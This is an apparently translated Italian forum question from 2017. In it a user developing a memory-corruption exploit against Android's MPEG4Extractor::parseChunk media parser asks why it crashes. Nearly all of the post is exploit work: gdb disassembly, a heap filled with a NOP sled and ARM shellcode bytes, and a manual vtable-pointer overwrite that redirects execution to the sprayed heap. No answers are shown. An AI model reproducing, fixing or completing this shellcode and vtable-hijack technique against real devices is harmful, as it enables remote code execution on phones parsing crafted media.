pc             0xb66e1042   0xb66e1042 <android::MPEG4Extractor::parseChunk(long long*, int)+74>

Speravo di vederlo nel registro PC ....

(gdb) disass 0xb66e1042
Dump of assembler code for function _ZN7android14MPEG4Extractor10parseChunkEPxi:
   0xb66e0ff8 <+0>: stmdb   sp!, {r4, r5, r6, r7, r8, r9, r10, r11, lr}
   0xb66e0ffc <+4>: vpush   {d8}
   0xb66e1000 <+8>: mov r6, r0
   0xb66e1002 <+10>:    ldr.w   r8, [pc, #708]  ; 0xb66e12c8 <_ZN7android14MPEG4Extractor10parseChunkEPxi+720>
   0xb66e1006 <+14>:    mov r9, r1
   0xb66e1008 <+16>:    ldr r3, [pc, #704]  ; (0xb66e12cc <_ZN7android14MPEG4Extractor10parseChunkEPxi+724>)
   0xb66e100a <+18>:    sub sp, #444    ; 0x1bc
   0xb66e100c <+20>:    add r8, pc
   0xb66e100e <+22>:    add r7, sp, #120    ; 0x78
   0xb66e1010 <+24>:    str r2, [sp, #52]   ; 0x34
   0xb66e1012 <+26>:    ldr.w   r5, [r8, r3]
   0xb66e1016 <+30>:    ldrd    r2, r3, [r1]
   0xb66e101a <+34>:    ldr r4, [sp, #52]   ; 0x34
   0xb66e101c <+36>:    ldr r1, [pc, #688]  ; (0xb66e12d0 <_ZN7android14MPEG4Extractor10parseChunkEPxi+728>)
   0xb66e101e <+38>:    ldr r0, [r5, #0]
   0xb66e1020 <+40>:    strd    r2, r3, [sp]
   0xb66e1024 <+44>:    ldr r2, [pc, #684]  ; (0xb66e12d4 <_ZN7android14MPEG4Extractor10parseChunkEPxi+732>)
   0xb66e1026 <+46>:    str r4, [sp, #8]
   0xb66e1028 <+48>:    add r1, pc
   0xb66e102a <+50>:    str r0, [sp, #436]  ; 0x1b4
   0xb66e102c <+52>:    movs    r0, #2
   0xb66e102e <+54>:    add r2, pc
   0xb66e1030 <+56>:    blx 0xb66bc038 <__android_log_print@plt>
   0xb66e1034 <+60>:    ldr r0, [r6, #80]   ; 0x50
   0xb66e1036 <+62>:    movs    r3, #8
   0xb66e1038 <+64>:    ldr r1, [r0, #0]
   0xb66e103a <+66>:    str r7, [sp, #0]
   0xb66e103c <+68>:    str r3, [sp, #4]
   0xb66e103e <+70>:    ldrd    r2, r3, [r9]
=> 0xb66e1042 <+74>:    ldr r4, [r1, #28]
   0xb66e1044 <+76>:    blx r4

Perché segfaults btw?

Aggiornamento 3:

Penso di averlo capito, il puntatore del vtable deve essere sovrascritto anche con un puntatore!

heap con nop e shellcode:

0xb3000230: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000240: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000250: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000260: 0xbf00bf00  0xbf00bf00  0xbf00bf00  0xbf00bf00
0xb3000270: 0xe28f3001  0xe12fff13  0x1c221b24  0x31ff21ff
0xb3000280: 0x31ff31ff  0x46783105  0x2705302a  0x2214df01
0xb3000290: 0x310c4679  0xdf012704  0x1c201b24  0xdf012701

Here set the vtable pointer to 0xb3000240

(gdb) set *((int *) 0xb8898ab8) = 0xb3000240
(gdb) x/10x 0xb8898ab8
0xb8898ab8: 0xb3000240  0xb8898ae8  0xb8898b00  0x00000000
0xb8898ac8: 0xb8891818  0x002e0064  0x0000001c  0x00000000
0xb8898ad8: 0x0100024c  0xb1fa3008
(gdb) delete breakpoints 
Delete all breakpoints? (y or n) y
(gdb) cont
Continuing.
[New LWP 6016]



Thread 11 "Binder_1" received signal SIGSEGV, Segmentation fault.
0xbf00bf00 in ?? ()
(gdb) i r
r0             0xb8898ab8   3096021688
r1             0xb3000240   3003122240
r2             0x1000305    16777989
r3             0x0  0
r4             0xbf00bf00   3204497152
r5             0xb6ebfde4   3068919268
r6             0xb8898b38   3096021816
r7             0xb513d700   3037976320
r8             0xb673e7d0   3061049296
r9             0xb513da68   3037977192
r10            0x1c 28
r11            0xffffffff   4294967295
r12            0xb513d1c8   3037974984
sp             0xb513d688   0xb513d688
lr             0xb6684047   -1234681785
pc             0xbf00bf00   0xbf00bf00
cpsr           0x200f0010   537853968
(gdb) 
    
posta android_dev 29.03.2017 - 15:10
fonte

0 risposte

Leggi altre domande sui tag